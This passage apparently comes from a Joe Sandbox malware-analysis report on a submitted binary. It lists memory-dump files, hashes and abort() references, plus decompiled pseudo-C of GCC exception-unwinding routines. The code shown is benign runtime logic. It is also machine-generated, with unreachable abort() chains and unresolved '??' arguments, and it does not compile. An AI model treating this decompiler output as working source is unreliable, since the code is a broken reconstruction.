Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1df33afa9d83d74e8e9d00b392f351bf12b847d138609283f212fa1515f3dba1
Instruction ID: 69ace7ec94069f618a065b1a9f99c21980b7e5269563f9a05d0e5ae98c8c8e4b
Opcode Fuzzy Hash: 1df33afa9d83d74e8e9d00b392f351bf12b847d138609283f212fa1515f3dba1
Instruction Fuzzy Hash: 1FD01277D4832E8AC1202D5D509437BF2FD9B5B558F8B6A18C85673640CA60EC41458A

Uniqueness

Uniqueness Score: -1.00%

Function 013D6E48 Relevance: 37.5, APIs: 25, Instructions: 39COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e8cc3abe8dd5107a505da49790f272dc3ce13df6c3d79a156ec7188c2d921028
Instruction ID: 2064130bd9ec904da4ea4b18668101ea1c16ae735b61fe827447e902d53819bb
Opcode Fuzzy Hash: e8cc3abe8dd5107a505da49790f272dc3ce13df6c3d79a156ec7188c2d921028
Instruction Fuzzy Hash: 50D01279D0932E8FC210AE4C909407BF2B89B5F248F863958D55173390C770E8058547

Uniqueness

Uniqueness Score: -1.00%

Function 013D6D98 Relevance: 37.5, APIs: 25, Instructions: 38COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ad793741c17f09d5e14edd1318059b57dd29e129dde3798c93b0a3911b79aa08
Instruction ID: d855fba6d141745f4d56af615b040412d23aa0558cb0f8753b16eb1abef5d908
Opcode Fuzzy Hash: ad793741c17f09d5e14edd1318059b57dd29e129dde3798c93b0a3911b79aa08
Instruction Fuzzy Hash: CCC08C75C8832E8AC0003D0D10E803AF2FC0A4B06DF8B3A28C09673A81C912D880010B

Uniqueness

Uniqueness Score: -1.00%

Function 013D7100 Relevance: 36.3, APIs: 24, Instructions: 280
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E013D7100(void* __eax, signed char** __edx, intOrPtr _a148, signed int _a152, signed char* _a156, intOrPtr _a160, char _a187) {
				void* _v16;
				char _v44;
				signed int _v60;
				signed char** _v140;
				void _v156;
				char _v160;
				signed char** _v176;
				signed int _v180;
				CHAR* _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				char* _v260;
				signed int _t105;
				char _t107;
				struct HINSTANCE__* _t108;
				_Unknown_base(*)()* _t109;
				struct HINSTANCE__* _t112;
				_Unknown_base(*)()* _t113;
				signed int _t115;
				signed int _t116;
				intOrPtr _t118;
				signed int _t121;
				signed int _t135;
				CHAR* _t136;
				struct HINSTANCE__* _t137;
				signed char* _t138;
				signed char _t143;
				signed int _t149;
				intOrPtr* _t153;
				signed char** _t157;
				signed int _t159;
				signed char** _t162;
				_Unknown_base(*)()* _t163;
				signed int _t164;
				signed char** _t166;
				void* _t170;
				signed int* _t172;
				char** _t173;
				char** _t174;
				struct HINSTANCE__** _t176;
				struct HINSTANCE__** _t177;

				_t166 = __edx;
				_t162 = __eax;
				_v196 = __eax;
				memcpy( &_v156, __eax, 0x20 << 2);
				_t172 = _t170 - 0xcc + 0xc;
				_t157 =  &(_t162[0x10]);
				_t105 = _v60 & 0x40000000;
				_v184 = _t105;
				if(_t105 == 0 || _v44 == 0) {
					_t162 = _v140;
					if(_t162 == 0) {
						_t107 =  *((intOrPtr*)(_v196 + 0x48));
						if( *0x14f20b4 != 4) {
							goto L58;
						} else {
							_t136 = _v184;
							_v160 = _t107;
							if(_t136 != 0) {
								_v44 = 0;
							}
							_v140 =  &_v160;
							goto L9;
						}
					} else {
						goto L9;
					}
				} else {
					L9:
					_t157 = _v196;
					_t115 = _t157[0x18];
					_v180 = _t115;
					_t116 = _t115 & 0x40000000;
					_v188 = _t116;
					if(_t116 != 0) {
						_t157[0x1c] = 0;
					}
					 *(_v196 + 0x10) = 0;
					_t118 = _a160;
					if(_t118 != 1) {
						if(_t118 != 2) {
							goto L59;
						} else {
							_t138 = _a156;
							_t164 = 0;
							_t143 = 0;
							do {
								_t149 =  *_t138 & 0x000000ff;
								_t138 =  &(_t138[1]);
								_t121 = (_t149 & 0x0000007f) << _t143;
								_t143 = _t143 + 7;
								_t164 = _t164 | _t121;
							} while (_t149 < 0);
							 *_t172 = 0;
							_v192 = E013D6A80(_t138,  &_v156,  &(_t138[_t164]));
							goto L22;
						}
					} else {
						_t135 = _a152;
						if(_t135 > 0x11) {
							L58:
							abort();
							L59:
							L013E42F8();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							abort();
							_push(_t166);
							_push(_t157);
							_push(_t162);
							_t173 = _t172 - 0x1c;
							 *_t173 = "libgcc_s_dw2-1.dll";
							_t108 = GetModuleHandleA(_t136);
							_t174 = _t173 - 4;
							if(_t108 == 0) {
								_t109 = 0x13dae40;
								_t163 = E013DA660;
							} else {
								_t137 = _t108;
								 *_t174 = "libgcc_s_dw2-1.dll";
								_t112 = LoadLibraryA(??);
								_t176 = _t174 - 4;
								 *0x14f2020 = _t112;
								_v260 = "__register_frame_info";
								 *_t176 = _t137;
								_t113 = GetProcAddress(??, ??);
								_t177 = _t176 - 8;
								_t163 = _t113;
								_v260 = "__deregister_frame_info";
								 *_t177 = _t137;
								_t109 = GetProcAddress(??, ??);
								_t174 = _t177 - 8;
							}
							 *0x1481004 = _t109;
							if(_t163 != 0) {
								_v260 = 0x14f2024;
								 *_t174 = 0x14b3104;
								 *_t163();
							}
							 *_t174 = E013C1560;
							return E013C14A0();
						} else {
							_t153 =  *((intOrPtr*)(_t172 + 0x40 + _t135 * 4));
							if(_v184 == 0 ||  *((char*)(_t172 + _t135 + 0xac)) == 0) {
								if( *((char*)(_t135 + 0x14f20b0)) != 4) {
									goto L58;
								} else {
									_t153 =  *_t153;
									goto L17;
								}
							} else {
								L17:
								_v192 = _t153 + _a148;
								L22:
								_v176 = _t166;
								_t159 = 0;
								 *((intOrPtr*)(_v196 + 0x48)) = _v192;
								_t162 = _t166;
								do {
									L23:
									while(_t162[1] <= 5) {
										switch( *((intOrPtr*)(_t162[1] * 4 +  &M014AC75C))) {
											case 0:
												goto L36;
											case 1:
												__ebp = _v188;
												__eax = _v192;
												__eax = _v192 +  *__esi;
												if(_v188 != 0) {
													__ecx = _v196;
													 *((char*)(_v196 + __edi + 0x6c)) = 0;
												}
												goto L44;
											case 2:
												__eax =  *__esi;
												if( *((char*)(__esp + __eax + 0xac)) != 0) {
													if(__eax > 0x11) {
														goto L58;
													} else {
														__ebx = _v184;
														__edx =  *(__eax + 0x14f20b0) & 0x000000ff;
														__eax =  *(__esp + 0x40 + __eax * 4);
														if(_v184 != 0) {
															goto L34;
														} else {
															if(__dl != 4) {
																goto L58;
															} else {
																__eax =  *__eax;
																goto L34;
															}
														}
													}
												} else {
													__ecx = _v188;
													__eax =  *(__esp + 0x40 + __eax * 4);
													if(__ecx != 0) {
														__edx = _v196;
														 *((char*)(__edx + __edi + 0x6c)) = 0;
													}
													__ebx = _v196;
													 *(_v196 + __edi * 4) = __eax;
													goto L36;
												}
												goto L82;
											case 3:
												__ebx =  *__esi;
												__ebp = 0;
												__ecx = 0;
												do {
													__edx =  *__ebx & 0x000000ff;
													__ebx = __ebx + 1;
													__edx = __edx & 0x0000007f;
													__eax = (__edx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__ebp = __ebp | (__edx & 0x0000007f) << __cl;
												} while (__dl < 0);
												__eax = _v192;
												__edx = __ebx + __ebp;
												__ecx =  &_v156;
												 *__esp = _v192;
												__eax = __ebx;
												__eax = E013D6A80(__ebx,  &_v156, __ebx + __ebp);
												__edx = _v188;
												if(__edx != 0) {
													__ebx = _v196;
													 *((char*)(_v196 + __edi + 0x6c)) = 0;
												}
												L44:
												__ecx = _v196;
												 *(__ecx + __edi * 4) = __eax;
												goto L36;
											case 4:
												__eax = _v192;
												__eax = _v192 +  *__esi;
												L34:
												if( *((char*)(__edi + 0x14f20b0)) > 4) {
													goto L58;
												} else {
													__ecx = _v196;
													 *((char*)(__ecx + __edi + 0x6c)) = 1;
													 *(__ecx + __edi * 4) = __eax;
													goto L36;
												}
												goto L82;
											case 5:
												_t139 =  *_t162;
												_t168 = 0;
												_t145 = 0;
												do {
													_t151 =  *_t139 & 0x000000ff;
													_t139 =  &(_t139[1]);
													_t128 = (_t151 & 0x0000007f) << _t145;
													_t145 = _t145 + 7;
													_t168 = _t168 | _t128;
												} while (_t151 < 0);
												 *_t172 = _v192;
												_t131 = E013D6A80(_t139,  &_v156,  &(_t139[_t168]));
												if( *((char*)(_t159 + 0x14f20b0)) > 4) {
													goto L58;
												} else {
													_t140 = _v196;
													_t162 =  &(_t162[2]);
													 *((char*)(_t140 + _t159 + 0x6c)) = 1;
													 *((intOrPtr*)(_t140 + _t159 * 4)) = _t131;
													_t159 = _t159 + 1;
													if(_t159 != 0x12) {
														goto L23;
													} else {
														L30:
														_t160 = _v180;
														_t133 = _t160 & 0x7fffffff;
														if(_a187 != 0) {
															_t133 = _t160 | 0x80000000;
														}
														 *(_v196 + 0x60) = _t133;
														return _t133;
													}
												}
												goto L82;
										}
									}
									L36:
									_t159 = _t159 + 1;
									_t162 =  &(_t162[2]);
								} while (_t159 != 0x12);
								goto L30;
							}
						}
					}
				}
				L82:
			}

0x013d7106
0x013d710a
0x013d7117
0x013d711b
0x013d711b
0x013d711b
0x013d7124
0x013d7129
0x013d712d
0x013d7139
0x013d713f
0x013d73e3
0x013d73e6
0x00000000
0x013d73ec
0x013d73ec
0x013d73f0
0x013d73f6
0x013d73f8
0x013d73f8
0x013d7404
0x00000000
0x013d7404
0x00000000
0x00000000
0x00000000
0x013d7145
0x013d7145
0x013d7145
0x013d7149
0x013d714c
0x013d7150
0x013d7155
0x013d7159
0x013d715b
0x013d715b
0x013d7163
0x013d716a
0x013d7173
0x013d71bb
0x00000000
0x013d71c1
0x013d71c1
0x013d71c7
0x013d71c9
0x013d71d0
0x013d71d0
0x013d71d3
0x013d71db
0x013d71dd
0x013d71e0
0x013d71e2
0x013d71e6
0x013d71fb
0x00000000
0x013d71fb
0x013d7175
0x013d7175
0x013d717e
0x0147aa00
0x0147aa00
0x0147aa05
0x0147aa05
0x0147aa0a
0x0147aa0f
0x0147aa14
0x0147aa19
0x0147aa1e
0x0147aa23
0x0147aa28
0x0147aa2d
0x0147aa32
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d7184
0x013d7188
0x013d718e
0x013d71a1
0x00000000
0x013d71a7
0x013d71a7
0x00000000
0x013d71a7
0x013d71a9
0x013d71a9
0x013d71af
0x013d71ff
0x013d7207
0x013d720b
0x013d720d
0x013d7210
0x013d7218
0x00000000
0x013d7218
0x013d7225
0x00000000
0x00000000
0x00000000
0x013d7350
0x013d7354
0x013d7358
0x013d735c
0x013d735e
0x013d7362
0x013d7362
0x00000000
0x00000000
0x013d7378
0x013d7382
0x013d73ab
0x00000000
0x013d73b1
0x013d73b1
0x013d73b5
0x013d73bc
0x013d73c2
0x00000000
0x013d73c8
0x013d73cb
0x00000000
0x013d73d1
0x013d73d1
0x00000000
0x013d73d1
0x013d73cb
0x013d73c2
0x013d7384
0x013d7384
0x013d7388
0x013d738e
0x013d7390
0x013d7394
0x013d7394
0x013d7399
0x013d739d
0x00000000
0x013d739d
0x00000000
0x00000000
0x013d7300
0x013d7302
0x013d7304
0x013d7310
0x013d7310
0x013d7313
0x013d7318
0x013d731b
0x013d731d
0x013d7320
0x013d7322
0x013d7326
0x013d732a
0x013d732d
0x013d7331
0x013d7334
0x013d7336
0x013d733b
0x013d7341
0x013d7343
0x013d7347
0x013d7347
0x013d7367
0x013d7367
0x013d736b
0x00000000
0x00000000
0x013d72c8
0x013d72cc
0x013d72ce
0x013d72d5
0x00000000
0x013d72db
0x013d72db
0x013d72df
0x013d72e4
0x00000000
0x013d72e4
0x00000000
0x00000000
0x013d7230
0x013d7232
0x013d7234
0x013d7240
0x013d7240
0x013d7243
0x013d724b
0x013d724d
0x013d7250
0x013d7252
0x013d7261
0x013d7266
0x013d7272
0x00000000
0x013d7278
0x013d7278
0x013d727c
0x013d727f
0x013d7284
0x013d7287
0x013d728d
0x00000000
0x013d7290
0x013d7290
0x013d7290
0x013d729a
0x013d72a6
0x013d72aa
0x013d72aa
0x013d72b3
0x013d72c0
0x013d72c0
0x013d728d
0x00000000
0x00000000
0x013d7225
0x013d72e7
0x013d72e7
0x013d72ea
0x013d72ed
0x00000000
0x013d72f6
0x013d718e
0x013d717e
0x013d7173
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738f507dcc587f26d98d1abf748c14a88a36efac6da323d1ab3b7af28ff06f46
Instruction ID: af6da405ba6d9a5a3870d81dae0f3d51f1a592c7e0ac16138974ac67e6fc27c0
Opcode Fuzzy Hash: 738f507dcc587f26d98d1abf748c14a88a36efac6da323d1ab3b7af28ff06f46
Instruction Fuzzy Hash: 8CB1D572A083868FD720CF28D48075BBBE2BF9530CF08496DE9959B342D775E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013D7420 Relevance: 33.1, APIs: 22, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E013D7420(CHAR* __eax, void* __ecx, void* __edx, void* _a4) {
				void* _v16;
				void* _v20;
				void* _v32;
				signed int _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v73;
				char* _v132;
				void* __ebx;
				signed int __edi;
				void* __esi;
				void* _t191;
				struct HINSTANCE__* _t192;
				_Unknown_base(*)()* _t193;
				struct HINSTANCE__* _t196;
				_Unknown_base(*)()* _t197;
				CHAR* _t198;
				struct HINSTANCE__* _t199;
				_Unknown_base(*)()* _t205;
				void* _t208;
				void* _t209;
				char** _t211;
				char** _t212;
				struct HINSTANCE__** _t214;
				struct HINSTANCE__** _t215;

				_t198 = __eax;
				_t209 = _t208 - 0x4c;
				_t191 = _a4;
				_v56 = __edx;
				_v68 = __ecx;
				 *((intOrPtr*)(_t191 + 0x90)) = 0;
				if(__eax >= __edx) {
					L17:
					return _t191;
				} else {
					__eax =  *(__ecx + 0x60);
					_v64 = 0;
					_v48 = __eax;
					__eax = __eax >> 0x1f;
					__eax = __eax +  *((intOrPtr*)(__ecx + 0x4c));
					__ecx = __ebx;
					_v52 = __eax;
					__ebx = _a4;
					while(1) {
						L8:
						__esi =  *(__ebx + 0xa4);
						__eax = _v52;
						if(__esi >= _v52) {
							goto L17;
						}
						_t17 = __ecx + 1; // 0x1
						__eax = _t17;
						_v48 = _t17;
						__eax =  *__ecx & 0x000000ff;
						__eax = __eax & 0xffffffc0;
						__edx = __eax & 0xffffffc0;
						if(__dl == 0x40) {
							__eax = __eax & 0x0000003f;
							__eax = __eax *  *(__ebx + 0xb0);
							 *(__ebx + 0xa4) = __eax;
							goto L15;
						} else {
							if(__dl == 0x80) {
								__edi = __eax;
								__eax = __eax & 0x0000003f;
								_a4 = __ebx;
								__edx = _v48;
								_v60 = __eax;
								__edi = __edi & 0x0000003f;
								__esi = 0;
								__ecx = 0;
								do {
									__ebx =  *__edx & 0x000000ff;
									__edx = __edx + 1;
									__ebx = __ebx & 0x0000007f;
									__eax = (__ebx & 0x0000007f) << __cl;
									__ecx = __ecx + 7;
									__esi = __esi | (__ebx & 0x0000007f) << __cl;
								} while (__bl < 0);
								__ebx = _a4;
								__eax = _v60;
								_v48 = __edx;
								__edx = __edi;
								__esi = __esi *  *(__ebx + 0xac);
								if(__dl <= 0x11) {
									 *((intOrPtr*)(__ebx + 4 + __eax * 8)) = 1;
									 *(__ebx + __eax * 8) = __esi;
								}
								goto L15;
							} else {
								if(__dl == 0xc0) {
									__ecx = __eax;
									__eax = __eax & 0x0000003f;
									__ecx = __ecx & 0x0000003f;
									if(__cl <= 0x11) {
										 *((intOrPtr*)(__ebx + 4 + __eax * 8)) = 0;
									}
									goto L15;
								} else {
									if(__al > 0x2f) {
										L131:
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										abort();
										_t211 = _t209 - 0x1c;
										 *_t211 = "libgcc_s_dw2-1.dll";
										_t192 = GetModuleHandleA(_t198);
										_t212 = _t211 - 4;
										if(_t192 == 0) {
											_t193 = 0x13dae40;
											_t205 = E013DA660;
										} else {
											_t199 = _t192;
											 *_t212 = "libgcc_s_dw2-1.dll";
											_t196 = LoadLibraryA(??);
											_t214 = _t212 - 4;
											 *0x14f2020 = _t196;
											_v132 = "__register_frame_info";
											 *_t214 = _t199;
											_t197 = GetProcAddress(??, ??);
											_t215 = _t214 - 8;
											_t205 = _t197;
											_v132 = "__deregister_frame_info";
											 *_t215 = _t199;
											_t193 = GetProcAddress(??, ??);
											_t212 = _t215 - 8;
										}
										 *0x1481004 = _t193;
										if(_t205 != 0) {
											_v132 = 0x14f2024;
											 *_t212 = 0x14b3104;
											 *_t205();
										}
										 *_t212 = E013C1560;
										return E013C14A0();
									} else {
										switch( *((intOrPtr*)(__eax * 4 +  &M014AC774))) {
											case 0:
												L15:
												__ecx = _v48;
												goto L16;
											case 1:
												__eax =  *(__ebx + 0xb8) & 0x000000ff;
												_t45 =  &_v32; // -28
												__ecx = _t45;
												 *__esp = _t45;
												__ecx = _v48;
												__edx =  *(__ebx + 0xb8) & 0x000000ff;
												__eax = _v68;
												__ecx = E013D68E0(_v68, _v48,  *(__ebx + 0xb8) & 0x000000ff);
												__eax = _v32;
												 *(__ebx + 0xa4) = _v32;
												goto L16;
											case 2:
												__eax =  *(__ecx + 1) & 0x000000ff;
												__eax = ( *(__ecx + 1) & 0x000000ff) *  *(__ebx + 0xb0);
												__ecx = __ecx + 2;
												 *(__ebx + 0xa4) = __eax;
												goto L16;
											case 3:
												__eax =  *(__ecx + 1) & 0x0000ffff;
												__eax = ( *(__ecx + 1) & 0x0000ffff) *  *(__ebx + 0xb0);
												__ecx = __ecx + 3;
												 *(__ebx + 0xa4) = __eax;
												goto L16;
											case 4:
												__eax =  *(__ebx + 0xb0);
												__eax =  *(__ebx + 0xb0) *  *(__ecx + 1);
												__ecx = __ecx + 5;
												 *(__ebx + 0xa4) = __eax;
												goto L16;
											case 5:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __edi;
												_v60 = __esi;
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __esi;
												__esi = _v60;
												_v48 = __edx;
												__edi = __edi *  *(__ebx + 0xac);
												if(__esi <= 0x11) {
													 *((intOrPtr*)(__ebx + 4 + __esi * 8)) = 1;
													 *(__ebx + __esi * 8) = __edi;
												}
												goto L15;
											case 6:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												goto L107;
											case 7:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_v48 = __edx;
												__ebx = __edi;
												if(__esi <= 0x11) {
													 *((intOrPtr*)(__edi + 4 + __esi * 8)) = 6;
												}
												goto L15;
											case 8:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												L107:
												_v48 = __edx;
												__ebx = __edi;
												if(__esi <= 0x11) {
